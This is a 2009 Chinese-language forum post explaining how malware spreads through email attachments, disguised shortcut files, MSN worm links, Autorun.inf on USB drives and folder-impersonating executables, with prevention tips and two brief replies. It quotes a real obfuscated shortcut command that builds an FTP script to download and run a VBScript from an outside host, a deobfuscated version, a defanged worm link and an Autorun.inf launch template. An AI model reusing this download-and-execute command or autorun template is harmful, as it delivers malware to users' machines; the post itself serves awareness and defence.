广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 4781 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
krichard2007
个人头像
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x16 鲜花 x15
分享: 转寄此文章 Facebook Plurk Twitter 版主评分 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
[资讯教学] 恶意程式之常见传播方式
在这数位化的时代,
电脑越来越方便,
但是在这方便之中,
确隐藏着许多危机,
许多恶意成是被制造出来,
也一个比一个厉害,
其传播方式也层出不穷,
以下为大家分享最近各恶意程式常见的传播方式。

以下图点击可放大

(一)网路
1.利用电子邮件传播
利用钓鱼的方式,
引诱对方下载其附件并执行它。
在很久之前,木马传播者都以.exe .com .scr 等执行档引诱别人
接着就进化出 xxxx.jpg.exe ~~等等引诱别人
或着是做成压缩档,
但是这样很容易就被防毒抓到了,
现在又进化出,利用xxx.lnk捷径 呼叫cmd.exe 利用FTP下载恶意程式,
且可以让捷径伪装成图档,让使用者认为是正常档案,藉此降低使用者的戒心,
呼叫cmd.exe也可以利用set变数来躲过许多防毒软体,
其代码如下
%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

整理一下代码(变数已还原):
cmd /c <=呼叫cmd命令提示字元
echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j <=读取连接档 下载t.vbs并执行下载 s.exe d.exe
echo start t.vbs>>j
ren j s.bat
call s.bat

预防方法:
不要随意开启别人用信箱寄过来的附件或连结,
开启前要先询问寄件者。

2.Yahoo即时通/MSN木马连结
同样的利用钓鱼方式,
引诱使用者点击或下载其恶意连结,
最近比较流行的是MSN病毒,
该病毒,如果中了,
只要你上了MSN就会自动对你的所有联络人发出带有病毒连结的恶意讯息~~
Ex:
haha, your PIC?hxxp://ufopyrenees. org/images/view.php?=account@hotmail.com
以上是病毒网址请勿连结(已经过特殊处理)

预防方法:
不随意开起来自MSN或及时通的可疑带连结讯息。

(二)硬碟/外接式硬碟
1.透过Autorun.inf自动播放传播...
此为传统随身碟病毒传播的方式。
该病毒会在你的每个磁区写入一个病毒主档+一个Autorun.inf
利用系统硬碟自动播放的功能,
让使用者开启硬碟时,
不是开启硬碟而是开启病毒主档,
以此方式入侵到你的系统。
Autorun.inf 的内容
大致上是
[AutoRun]
Open=XXX.EXE
Shell\Open\Command=XXX.EXE
Shell\Explore\Command=XXX.EXE

注:XXX.EXE为病毒执行档 (副档名可以是.bat .cmd .scr .pif .vbs 等可执行副档名)
代表双击开启磁碟会开启XXX.EXE
对磁碟按右键开启会开启XXX.EXE
对磁碟按右键档案总管会开启XXX.EXE

检测方式,
最简单的方式,
利用WinRAR开启你的外接式硬碟
检查有没有可疑的执行档和AUTORUN.INF
例图:


预防方法:
关闭自动播放
建议是下载安装Microsoft释出的补丁KB971029
http://support.micros...b/971029
关闭光碟机以外其他磁区的自动播放
并再妮的任何外接式硬碟跟目录建立一个名为autorun.inf的资料夹~~

2.资料夹病毒
掉包你随身碟跟目录的资料夹,
建立假的伪装资料夹执行档,
引诱使用者点击,
检测方式,
用WinRAR开启你的磁碟或外接式磁碟,
以下是使用 WinRAR 开启被感染的随身碟画面~

被".exe"资料夹病毒感染的随身碟...


被".scr"资料夹病毒感染的随身碟...


被".lnk"(捷径)资料夹病毒感染的随身碟...


被"进阶"档案取代式资料夹病毒感染的随身碟...


预防方式:
进到随身碟里面
按检视 > 选择 详细资料


如果被别的电脑感染了,
请先暂时不要碰那些伪装的资料夹,
可以下载FolderFix修复
http://www.wretch.cc/blog...5/15727032

3.档案感染
感染所有磁区.exe可执行档
预防方法建议存放于随身碟中的EXE档案,
都把他们压缩起来,
这样子可以减少随身碟在外,受到别台电脑的感染。

以上为目前比较常见的恶意程式传播方式~
如有不足的地方,欢迎大家提供。

也欢迎大家转贴...
但是请注明出处唷~~

By K.Richard
http://www.wretch.cc/blog...5/15812444

此文章被评分,最近评分记录
财富:100 (by upside) | 理由: 感谢提供 参考资料 数位男女因你而丰富



献花 x2 回到顶端 [楼 主] From:欧洲 | Posted:2009-10-08 17:20 |
poan3
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x77
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

真的好毒。。

看不太懂 但也要谢谢 大大


祝福大家:新年快乐!事业高升!身体健康!万事如意!~牛年行大运~新的一年财源滚滚来~!
献花 x0 回到顶端 [1 楼] From:台湾中华电信HINET | Posted:2009-10-08 22:46 |
liujenha 手机
数位造型
个人文章 个人相簿 个人日记 个人地图
风云人物
级别: 风云人物 该用户目前不上站
推文 x0 鲜花 x4768
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

真的是好毒呀


献花 x0 回到顶端 [2 楼] From:台湾中华HiNet | Posted:2009-10-09 07:21 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.086265 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言